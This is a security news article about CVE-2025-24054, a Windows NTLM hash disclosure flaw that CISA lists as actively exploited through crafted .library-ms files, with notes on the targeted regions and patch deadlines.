Urgent Cybersecurity Warning: Microsoft Windows Vulnerability Exposed to Active Exploitation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently highlighted a medium-severity security flaw impacting Microsoft Windows, adding it to their Known Exploited Vulnerabilities (KEV) catalog. This flaw has been actively exploited in the wild and poses a significant threat to organizations worldwide. The flaw, identified as CVE-2025-24054, is a spoofing vulnerability within the Windows New Technology LAN Manager (NTLM), a legacy authentication protocol. While Microsoft released a patch for this issue last month, reports indicate that threat actors are still actively exploiting it, putting sensitive data and systems at risk.

Overview of the Vulnerability

The vulnerability, CVE-2025-24054, carries a CVSS score of 6.5, indicating a medium severity level. It revolves around a Windows NTLM hash disclosure issue. NTLM, which Microsoft deprecated in favor of Kerberos last year, has been targeted by attackers using various techniques like pass-the-hash and relay attacks. In this case, the flaw enables unauthorized attackers to perform spoofing attacks over a network, leaking NTLM hashes or user credentials.

The vulnerability can be triggered with minimal user interaction. Specifically, simply interacting with a specially crafted .library-ms file—such as selecting, inspecting, or right-clicking on it—can trigger the exploit. The security hole was first patched by Microsoft during their Patch Tuesday updates in March 2025. However, since March 19, active exploitation has been observed in the wild, confirming the vulnerability is being actively targeted by cybercriminals.

The flaw is seen as a variant of the previously disclosed CVE-2024-43451, which had also been weaponized in attacks earlier in 2024. These attacks have been mostly focused on government and private institutions, with some campaigns targeting regions such as Poland and Romania. Threat actors are using social engineering techniques, including malspam emails containing links to Dropbox archives, to deliver the exploit.

What Undercode Says:

The CVE-2025-24054 vulnerability represents a critical risk for organizations still relying on NTLM, a deprecated and increasingly vulnerable authentication protocol. Microsoft’s decision to phase out NTLM in favor of Kerberos has not deterred attackers from continuing to target it. In fact, this vulnerability demonstrates the ongoing security risks that outdated technologies can pose. Despite Microsoft’s patch, the active exploitation of this flaw shows how cybercriminals are always looking for ways to leverage security gaps in enterprise environments.

The fact that this flaw can be exploited with minimal user interaction makes it even more dangerous. Attackers don’t need users to actively run or open a file; the simple act of downloading and extracting a malicious ZIP file containing the .library-ms file is enough to trigger the vulnerability. This ease of exploitation, combined with the potential to steal NTLM hashes, makes it a prime target for lateral movement and privilege escalation within compromised networks. For organizations that haven’t yet fully mitigated NTLM vulnerabilities, this presents an urgent security concern.

The attacks seen so far have largely focused on government and private sector organizations in Poland, Romania, and other regions. Cybersecurity firm Check Point’s research indicates that over ten separate campaigns have been detected, all aiming to steal NTLM hashes via malicious .library-ms files. The attackers use these hashes to gain unauthorized access to sensitive systems, often leading to larger, more damaging breaches within organizations.

Organizations that haven’t updated their systems or patched this vulnerability risk facing significant threats. Moreover, for agencies within the Federal Civilian Executive Branch (FCEB), there is a hard deadline of May 8, 2025, to apply the necessary patches. Failure to do so could leave critical networks exposed to ongoing exploitation.

Fact Checker Results:

Exploitability: CVE-2025-24054 is an actively exploited vulnerability, despite Microsoft’s assessment of “Exploitation Less Likely.”
Targeted Entities: Attackers have specifically targeted government and private sector institutions, mainly in Poland and Romania.
Urgency: CISA’s inclusion of this vulnerability in the KEV catalog underscores its critical nature and the need for immediate remediation.